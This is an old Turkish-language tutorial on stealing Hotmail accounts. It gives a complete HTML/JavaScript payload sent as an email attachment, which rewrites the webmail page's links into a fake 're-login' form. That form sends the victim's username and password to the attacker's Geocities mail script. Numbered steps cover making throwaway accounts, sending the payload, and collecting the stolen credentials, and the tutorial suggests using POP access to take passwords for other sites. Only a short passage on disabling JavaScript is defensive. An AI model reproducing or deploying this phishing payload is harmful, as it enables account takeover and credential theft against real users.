Microsoft'un ünlü ücretsiz e-mail sitesi hack edildi. Nasil mi oluyor?

Kurbana Javascript codu iceren bir e-mail attiyorsunuz.Kurban bu e-mail'i görüntüledigi zaman Javascript kodu devreye giriyor ve Kurbana tekrar Login olmasini söylüyor.Tabii böyle olunca size kurbanin kullanici adi ve ip adresini iceren bir e-mail geliyor.

Tabii siz kullanici adini ve sifresini ögrendiginiz zaman hesabin tam kullanin hakkini kazaniyorsunuz.silmek, okumak, kurban adina mailler göndermek... Tabii siz bos durmayip POP Mail'leride kontrol ediyorsunuz ve kurbanin diger sitelerdeki hesaplarinin sifrelerini aliyorsunuz.

Peki bu olaydan kurtulamayacagiz mi ??

Netscape kullanicilari javascript ayarlarini söyle kapatabilir. (edit / preferences / advanced / disablejavascript).

Microsoft Internet Explorer kullanicilari jscript ayarlarini su sekilde kapatabiliir. (view / internet options /security / custom settings / scripting / disable active scripting).

Tabii En Önemlisi Baskasinin Hotmail Hesabini Nasil Ele Geciririz ???

Asagidaki Listedekiler elimizde olmali.

1 Internete bagli bir bilgisayar... eh yani :-))
1 Netscape Mail (veya herhangi bir e-mail programi)
1 Notepad (veya herhangi bir text editor)

1.ADIM

hotmail.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler yazsakta olur.

2.ADIM:

Geocities.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler yazsakta olur.1.adimda e-mail adresini kullandik.ve geocities'ten bir e-mail adresi aldik.örnegin(ybwc@geocities.com).

3.ADIM:

NotePad'imizi aciyoruz ve asagidaki text'i yaziyoruz. Daha sonra message.htm ismini verip kayit ediyoruz. Satir 17'de Geocities kullanici adimiz yaziyor. (ybwc) 2.adimda belirttigimiz gibi. (bu kullanici adini kendinize göre degistirin.)

<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" +
"<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>" +
"<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\" target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\"> <input type=\"submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">";
}

nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="javascript:getmess()";
}

noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="javascript:getmess()";
}

</script>
</body>
</html>

4.ADIM

kurbanizima yeni bir e-mail mesaji hazirlayip gönderiyoruz.örnegin: kurban, (victim@hotmail.com)olsun. E-mailimize message.htm dosyasinida ekliyoruz ve gönderiyoruz.

5.ADIM

Kurbanimizin e-mailini kontrol etmesini bekliyoruz. Kurban bizim e-maili görüntüledigi zaman Geocities'teki mailimizi kontrol ediyoruz. Geocities2ten bir mail aliyoruz. Tabii bu mail'de kurbanimizin kullanici adi, sifresi ve ip adresi oluyor...